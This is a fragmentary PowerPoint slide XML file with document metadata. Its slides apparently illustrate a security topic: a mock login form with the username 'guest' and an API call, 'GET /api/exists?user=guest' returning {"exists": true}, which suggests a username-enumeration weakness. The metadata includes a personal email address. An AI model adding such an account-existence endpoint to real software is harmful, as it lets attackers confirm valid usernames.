              </a:rPr>
              <a:t>Plzzz</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="4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92100-0CF4-4D21-B1D7-551D01AB88D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="723900" y="2777484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Username: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0E359-5E19-4716-A490-AA737AB6D8A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="723900" y="3221225"/>
            <a:ext cx="1662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43C2D8-6783-49E8-8FEE-FA05E140EE44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2491807" y="2860429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/>
              <a:t>guest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17FB60-3892-487C-A10F-12E8A191B755}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2491806" y="3300704"/>
            <a:ext cx="2184968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B32655-5B42-46FE-85DC-A5F1A2F18B57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="805882" y="3798234"/>
            <a:ext cx="1108643" cy="376516"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 12751"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3C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580C2-72E9-4E5C-A5C7-543154F9B406}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6589333" y="2984722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GET /api/exists?user=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU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guest</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:b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{"exists": true}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FD7DB2-364E-45B9-A59D-F3A92DD9253A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4962525" y="3048687"/>
            <a:ext cx="1482156" cy="60226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4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1346</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>264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jgbstephenson@gmail.com</dc:creator>
  <cp:lastModifiedBy>Adam Kues</cp:lastModifiedBy>
  <cp:revision>54</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-04-15T07:15:01Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-10-15T11:42:07Z</dcterms:modified>
</cp:coreProperties>
</file>